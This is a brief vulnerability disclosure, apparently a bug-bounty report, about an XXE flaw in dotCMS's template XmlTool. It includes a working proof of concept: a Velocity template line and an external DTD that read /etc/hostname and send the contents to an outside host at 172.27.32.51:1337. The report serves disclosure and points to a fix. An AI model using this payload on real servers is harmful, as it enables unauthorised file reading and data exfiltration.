Description

Hello, dotCMS has an XXE vulnerability in the template design page. To exploit this flaw, a attacker needs the permission to edit and preview templates, and this can be abused to read internal files

Video Poc

This section of the documentation explain how to use the XMLTool in the template engine, this allow us to direct write xml content to the application

If we analyse the content of src\main\java\com\dotcms\rendering\velocity\viewtools\XmlTool.java on line 156 to 158 we find the following code

protected void parse(String xml) throws Exception {
    setRoot(DocumentHelper.parseText(xml));
}

If we analyse the documentation of dom4j (where does the DocumentHelper class come from) we found the following description to the parseText method

Loading external DTD and entities is disabled (if it is possible) for security reasons.

I don't know exactly why this is disable in your case (I am using your docker image) but its vulnerable to XXE, I recommend using only SaxReader instead of depending of a volatile class / method

Proof of Concept

#set($myXML = $xmltool.parse("<!DOCTYPE data SYSTEM 'http://172.27.32.51:1337/xxe.dtd'><data>&send;</data>"))

xxe.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.27.32.51:1337/?%file;'>">
%all;

Impact

File system read access